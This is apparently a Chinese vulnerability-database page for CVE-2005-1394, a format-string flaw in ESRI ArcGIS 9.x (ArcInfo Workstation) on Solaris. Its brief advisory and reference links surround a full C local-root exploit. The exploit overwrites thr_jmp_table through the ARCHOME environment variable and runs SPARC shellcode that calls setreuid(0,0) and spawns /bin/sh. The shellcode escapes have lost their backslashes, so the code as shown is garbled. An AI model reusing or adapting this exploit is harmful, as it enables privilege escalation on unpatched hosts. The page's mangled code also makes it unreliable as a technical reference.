ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞

ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞

漏洞ID 1108733 漏洞类型 格式化字符串
发布时间 2005-04-30 更新时间 2005-10-20
图片[1]-ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞-安全小百科CVE编号 CVE-2005-1394
图片[2]-ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞-安全小百科CNNVD-ID CNNVD-200505-877
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/972
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-877
|漏洞详情
ESRIArcInfoWorkstation9.0的ArcGIS存在格式化字符串漏洞,本地用户可以通过在传递给(1)wservice或(2)lockmgr的ARCHOME环境变量中的格式化字符串限定符来获取权限。
|漏洞EXP
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "xa2x1cx40x11"
int             iType;

struct
{
       unsigned long retloc;
       unsigned long retaddr;
       char          *type;
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
          0003a234 d thr_jmp_table
        */
       {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
       {0x41424344,0x41424344,"DEBUG"},
        },v;

//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

       // setreuid(0,0);

       "x90x1dx80x16"      // xor  %l6, %l6, %o0
       "x92x1dx80x16"      // xor  %l6, %l6, %o1
       "x82x10x20xca"      // mov  0xca, %g1
       "x91xd0x20x08"      // ta  8

       "x90x1dx80x16"      // xor          %l6, %l6, %o0
       "x92x1dx80x16"      // xor          %l6, %l6, %o1
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20xcb"      // mov          0x2e, %g1
       "x91xd0x20x08"      // ta           8                       [setregid(0,0)]

       "x21x0bxd9x19"      // sethi        %hi(0x2f646400), %l0
       "xa0x14x21x76"      // or           %l0, 0x176, %l0
       "x23x0bxddx1d"      // sethi        %hi(0x2f747400), %l1
       "xa2x14x60x79"      // or           %l1, 0x79, %l1
       "xe0x3bxbfxf8"      // std          %l0, [ %sp - 0x8 ]
       "x90x23xa0x08"      // sub          %sp, 8, %o0
       "x92x1bx80x0e"      // xor          %sp, %sp, %o1
       "x82x10x20x05"      // mov          0x05, %g1
       "x91xd0x20x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "x90x10x20x02"      // mov          0x02, %o0
       "x82x10x20x29"      // mov          0x29, %g1
       "x91xd0x20x08"      // ta           8                       [dup(2)]

       "x21x0bxd8x9a"      // sethi        %hi(0x2f626800), %l0
       "xa0x14x21x6e"      // or           %l0, 0x16e, %l0
       "x23x0bxcbxdc"      // sethi        %hi(0x2f2f7000), %l1
       "xa2x14x63x68"      // or           %l1, 0x368, %l1
       "xe0x3bxbfxf0"      // std          %l0, [ %sp - 0x10 ]
       "xc0x23xbfxf8"      // clr          [ %sp - 0x8 ]
       "x90x23xa0x10"      // sub          %sp, 0x10, %o0
       "xc0x23xbfxec"      // clr          [ %sp - 0x14 ]
       "xd0x23xbfxe8"      // st           %o0, [ %sp - 0x18 ]
       "x92x23xa0x18"      // sub          %sp, 0x18, %o1
       "x94x22x80x0a"      // sub          %o2, %o2, %o2
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20x3b"      // mov          0x3b, %g1
       "x91xd0x20x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "x82x10x20x01"      // mov          0x01, %g1
       "x91xd0x20x08"      // ta           8                       [exit(?)]

       "x10xbfxffxdf"      // b            shellcode
       "x90x1dx80x16";     // or           %o1, %o1, %o1

/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   *ptr++ = (char) (value >> 24) & 0xff;
   *ptr++ = (char) (value >> 16) & 0xff;
   *ptr++ = (char) (value >> 8) & 0xff;
   *ptr++ = (char) (value >> 0) & 0xff;

   return ptr;
}

/* main */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;
   int dump_fmt=129;
   int al = 1;
   int i=0;
   int x=0;
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char            buf2[9000];

   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }

if (argc < 2) { usage(argv[0]); exit(1); }

   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.n");
       return 0;
}

   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   args[0] = VULPROG;
   args[1] = NULL;

  retloc =  targets[iType].retloc;
  retaddr = targets[iType].retaddr;

   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   memset(buf,0x00,sizeof(buf));
   memset(buf2,0x00,sizeof(buf2));
   ptr = buf;

    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }

   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));

   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   int     i;
   printf( "Arcgis local root format string exploitrn");
   printf( "Usage: %s <-t target>n",p);
   for(i=0;i<sizeof(targets)/sizeof(v);i++)
   {
       printf("%dt%sn", i, targets[i].type);
   }
   return 0;
}

// milw0rm.com [2005-04-30]
|参考资料

来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
来源:SECTRACK
名称:1013852
链接:http://securitytracker.com/id?1013852
来源:SECUNIA
名称:15196
链接:http://secunia.com/advisories/15196
来源:support.esri.com
链接:http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID;=14&MetaID;=1015
来源:FULLDISC
名称:20050430DMA[2005-0425a]-‘ESRIArcGIS9.xmultiplelocalvulnerabilities
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111489411524630&w;=2

相关推荐: Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability

Microsoft OWC Spreadsheet XMLURL Local File Existence Disclosure Vulnerability 漏洞ID 1102211 漏洞类型 Design Error 发布时间 2002-04-08 更新时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享